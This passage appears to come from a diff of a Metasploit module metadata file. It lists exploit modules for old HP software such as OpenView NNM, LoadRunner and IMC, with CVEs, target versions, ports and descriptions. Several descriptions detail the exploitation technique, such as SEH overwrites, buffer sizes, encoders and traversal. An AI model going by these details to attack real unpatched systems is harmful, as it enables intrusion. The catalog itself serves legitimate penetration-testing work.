This module has been tested\n successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.", - "references": [ - "CVE-2012-5201", - "OSVDB-91026", - "BID-58385", - "ZDI-13-050", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276" - ], - "platform": "Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP Intelligent Management Center 5.1 E0202 / Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_imc_mibfileupload.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_imc_mibfileupload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_loadrunner_copyfiletoserver": { - "name": "HP LoadRunner EmulationAdmin Web Service Directory Traversal", - "fullname": "exploit/windows/http/hp_loadrunner_copyfiletoserver", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-10-30", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits a directory traversal vulnerability in version 11.52 of HP\n LoadRunner. The vulnerability exists in the EmulationAdmin web service, specifically\n in the copyFileToServer method, allowing the upload of arbitrary files. 
This module has\n been tested successfully on HP LoadRunner 11.52 on Windows 2003 SP2.", - "references": [ - "CVE-2013-4837", - "OSVDB-99231", - "BID-63475", - "ZDI-13-259", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437" - ], - "platform": "Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP LoadRunner 11.52" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_loadrunner_copyfiletoserver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_mpa_job_acct": { - "name": "HP Managed Printing Administration jobAcct Remote Command Execution", - "fullname": "exploit/windows/http/hp_mpa_job_acct", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-12-21", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module exploits an arbitrary file upload vulnerability on HP Managed Printing\n Administration 2.6.3 and prior versions. The vulnerability exists in the UploadFiles()\n function from the MPAUploader.Uploader.1 control, loaded and used by the server.\n The function can be abused via directory traversal and null byte injection in order\n to achieve arbitrary file upload. In order to exploit successfully, a few conditions\n must be met. First, a writable location under the context of Internet Guest Account\n (IUSR_*) or Everyone is required. By default, this module will attempt to write to\n /hpmpa/userfiles/, but the WRITEWEBFOLDER option can be used to provide\n another writable path. 
Second, the writable path must also be readable by a browser,\n so this typically means a location under wwwroot. Finally, you cannot overwrite\n a file with the same name as the payload.", - "references": [ - "CVE-2011-4166", - "OSVDB-78015", - "BID-51174", - "ZDI-11-352", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03128469" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP Managed Printing Administration 2.6.3 / Microsoft Windows [XP SP3 | Server 2003 SP2]" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/hp_mpa_job_acct.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_mpa_job_acct", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_getnnmdata_hostname": { - "name": "HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_getnnmdata_hostname", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted Hostname parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-1555", - "OSVDB-64976" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50", - "HP OpenView Network Node Manager 7.53" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_getnnmdata_hostname", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_getnnmdata_icount": { - "name": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_getnnmdata_icount", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-1554", - "OSVDB-64976" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50", - "HP OpenView Network Node Manager 7.53" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_getnnmdata_icount", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_getnnmdata_maxage": { - "name": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_getnnmdata_maxage", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n By sending specially 
crafted MaxAge parameter to the getnnmdata.exe CGI,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-1553", - "OSVDB-64976" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50", - "HP OpenView Network Node Manager 7.53" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_getnnmdata_maxage", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_nnmrptconfig_nameparams": { - "name": "HP OpenView NNM nnmRptConfig nameParams Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_nameparams", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-10", - "type": "exploit", - "author": [ - "sinn3r ", - "MC " - ], - "description": "This module exploits a vulnerability in HP NNM's nnmRptConfig.exe.\n A remote user can send a long string data to the nameParams parameter via\n a POST request, which causes an overflow on the stack when function\n ov.sprintf_new() is used, and gain arbitrary code execution.'", - "references": [ - "CVE-2011-0266", - "OSVDB-70473", - "ZDI-11-008" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP NNM 7.53 Windows Server 2003 Enterprise", - "HP OpenView Network Node Manager 7.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb", - "is_install_path": true, - "ref_name": 
"windows/http/hp_nnm_nnmrptconfig_nameparams", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_nnmrptconfig_schdparams": { - "name": "HP OpenView NNM nnmRptConfig.exe schdParams Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_nnmrptconfig_schdparams", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-01-10", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits NNM's nnmRptConfig.exe. Similar to other NNM CGI bugs,\n the overflow occurs during a ov.sprintf_new() call, which allows an attacker to\n overwrite data on the stack, and gain arbitrary code execution.", - "references": [ - "CVE-2011-0267", - "OSVDB-70473", - "ZDI-11-009" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "NNM 7.53 - Windows Server 2003 Ent" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_nnmrptconfig_schdparams", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_openview5": { - "name": "HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_openview5", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-12-06", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2007-6204", - "OSVDB-39530", - 
"BID-26741" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP OpenView Network Node Manager 7.50 / Windows 2000 All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_openview5.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_openview5", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovalarm_lang": { - "name": "HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovalarm_lang", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-09", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n By sending a specially crafted CGI request to ovalarm.exe, an attacker can execute\n arbitrary code.\n\n This specific vulnerability is due to a call to \"sprintf_new\" in the \"isWide\"\n function within \"ovalarm.exe\". A stack buffer overflow occurs when processing an\n HTTP request that contains the following.\n\n 1. An \"Accept-Language\" header longer than 100 bytes\n 2. 
An \"OVABverbose\" URI variable set to \"on\", \"true\" or \"1\"\n\n The vulnerability is related to \"_WebSession::GetWebLocale()\".\n\n NOTE: This exploit has been tested successfully with a reverse_ord_tcp payload.", - "references": [ - "CVE-2009-4179", - "OSVDB-60930", - "BID-37347", - "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-09-12", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53", - "HP OpenView Network Node Manager 7.53 (Windows 2003)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovalarm_lang", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovas": { - "name": "HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovas", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-04-02", - "type": "exploit", - "author": [ - "bannedit ", - "muts" - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n Specifically this vulnerability is caused by a failure to properly handle user supplied input within the\n HTTP request including headers and the actual URL GET request.\n\n Exploitation is tricky due to character restrictions. 
It was necessary to utilize a egghunter shellcode\n which was alphanumeric encoded by muts in the original exploit.\n\n If you plan on using exploit this for a remote shell, you will likely want to migrate to a different process\n as soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n handling code that causes this.", - "references": [ - "CVE-2008-1697", - "OSVDB-43992", - "BID-28569" - ], - "platform": "Windows", - "arch": "", - "rport": 7510, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Windows 2003/zip.dll OpenView 7.53", - "Windows 2000/jvm.dll OpenView NNM 7.51" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovas.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovas", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovbuildpath_textfile": { - "name": "HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovbuildpath_textfile", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-11-01", - "type": "exploit", - "author": [ - "Anyway ", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node\n Manager 7.53 prior to NNM_01213 without the SSRT100649 hotfix. By specifying a long\n 'textFile' argument when calling the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n The vulnerable code is within the \"_OVBuildPath\" function within \"ov.dll\". 
There\n are no stack cookies, so exploitation is achieved by overwriting the saved return\n address.\n\n The vulnerability is due to the use of the function \"_OVConcatPath\" which finally\n uses \"strcat\" in an insecure way. User controlled data is concatenated to a string\n which contains the OpenView installation path.\n\n To achieve reliable exploitation a directory traversal in OpenView5.exe\n (OSVDB 44359) is being used to retrieve OpenView logs and disclose the installation\n path. If the installation path cannot be guessed the default installation path\n is used.", - "references": [ - "CVE-2011-3167", - "OSVDB-76775", - "BID-50471", - "ZDI-12-002", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03054052" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 / Windows 2000 SP4 & Windows XP SP3" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovbuildpath_textfile.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovbuildpath_textfile", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/hp_nnm_ovwebhelp": { - "name": "HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebhelp", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to OvWebHelp.exe, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2009-4178", - "OSVDB-60929", - "BID-37340" 
- ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebhelp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovwebsnmpsrv_main": { - "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_main", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-06-16", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. The buffer being\n written to is 1024 bytes in size. It is important to note that this vulnerability must\n be exploited by overwriting SEH. Otherwise, CVE-2010-1961 is triggered!\n\n The vulnerable code is within the \"main\" function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010. There are no stack cookies, so exploitation is\n easily achieved by overwriting SEH structures.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. 
It is not clear what is causing this\n either.", - "references": [ - "CVE-2010-1964", - "OSVDB-65552", - "BID-40873", - "ZDI-10-108" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01201", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_main", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovwebsnmpsrv_ovutil": { - "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-06-16", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is triggerable via either a GET or POST request. It is interesting to\n note that this vulnerability cannot be exploited by overwriting SEH, since attempting\n to would trigger CVE-2010-1964.\n\n The vulnerable code is within a sub-function called from \"main\" within \"ovwebsnmpsrv.exe\"\n with a timestamp prior to April 7th, 2010. This function contains a 256 byte stack buffer\n which is passed to the \"getProxiedStorageAddress\" function within ovutil.dll. 
When\n processing the address results in an error, the buffer is overflowed in a call to sprintf_new.\n There are no stack cookies present, so exploitation is easily achieved by overwriting the\n saved return address.\n\n There exists some unreliability when running this exploit. It is not completely clear why\n at this time, but may be related to OVWDB or session management. Also, on some attempts\n OV NNM may report invalid characters in the URL. It is not clear what is causing this\n either.", - "references": [ - "CVE-2010-1961", - "OSVDB-65428", - "BID-40638", - "ZDI-10-106", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02217439" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01201", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_ovutil", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_ovwebsnmpsrv_uro": { - "name": "HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-06-08", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. 
By specifying a long 'arg' parameter when executing the 'jovgraph.exe'\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code.\n The vulnerable code is within the option parsing function within \"ovwebsnmpsrv.exe\" with a\n timestamp prior to April 7th, 2010.\n\n Reaching the vulnerable code requires a 'POST' request with an 'arg' parameter that, when combined\n with some static text, exceeds 10240 bytes. The parameter must begin with a dash. It is\n important to note that this vulnerability must be exploited by overwriting SEH. This is since\n overflowing the buffer with controllable data always triggers an access violation when\n attempting to write static text beyond the end of the stack.\n\n Exploiting this issue is a bit tricky due to a restrictive character set. In order to accomplish\n arbitrary code execution, a double-backward jump is used in combination with the Alpha2\n encoder.", - "references": [ - "CVE-2010-1960", - "OSVDB-65427", - "BID-40637", - "ZDI-10-105" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01206", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_ovwebsnmpsrv_uro", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_snmp": { - "name": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_snmp", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer 
overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2009-3849", - "OSVDB-60933" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50 / Windows 2000 All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_snmp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_snmp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_snmpviewer_actapp": { - "name": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_snmpviewer_actapp", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-05-11", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\"\n CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary\n code.\n\n The vulnerable code lies within a function within \"snmpviewer.exe\" with a\n timestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET\n or POST request. 
The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".", - "references": [ - "CVE-2010-1552", - "OSVDB-64975", - "BID-40068", - "ZDI-10-083", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.53 w/NNM_01201", - "HP OpenView Network Node Manager 7.53 (Windows 2003)", - "Debug Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_snmpviewer_actapp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_toolbar_01": { - "name": "HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_toolbar_01", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-01-07", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute\n arbitrary code.", - "references": [ - "CVE-2008-0067", - "OSVDB-53222", - "BID-33147" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - 
"https" - ], - "targets": [ - "HP OpenView Network Node Manager 7.50 / Windows 2000 All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_toolbar_01.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_toolbar_01", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_toolbar_02": { - "name": "HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_toolbar_02", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-21", - "type": "exploit", - "author": [ - "Oren Isacson", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0\n and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an\n attacker may be able to execute arbitrary code. Please note that this module only works\n against a specific build (i.e. 
NNM 7.53_01195)", - "references": [ - "CVE-2009-0920", - "OSVDB-53242", - "BID-34294", - "URL-http://www.coresecurity.com/content/openview-buffer-overflows" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "HP OpenView Network Node Manager Release B.07.00", - "HP OpenView Network Node Manager 7.53 Patch 01195" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/hp_nnm_toolbar_02.rb", - "is_install_path": true, - "ref_name": "windows/http/hp_nnm_toolbar_02", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/hp_nnm_webappmon_execvp": { - "name": "HP OpenView Network Node Manager execvp_nc Buffer Overflow", - "fullname": "exploit/windows/http/hp_nnm_webappmon_execvp", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-07-20", - "type": "exploit", - "author": [ - "Shahin Ramezany ", - "sinn3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53\n prior to NNM_01207 or NNM_01206 without the SSRT100025 hotfix. By specifying a long 'sel'\n parameter when calling methods within the 'webappmon.exe' CGI program, an attacker can\n cause a stack-based buffer overflow and execute arbitrary code.\n\n This vulnerability is not triggerable via a GET request due to limitations on the\n request size. The buffer being targeted is 16384 bytes in size. There are actually two\n adjacent buffers that both get overflowed (one into the other), and strcat is used.\n\n The vulnerable code is within the \"execvp_nc\" function within \"ov.dll\" prior to\n v 1.30.12.69. 
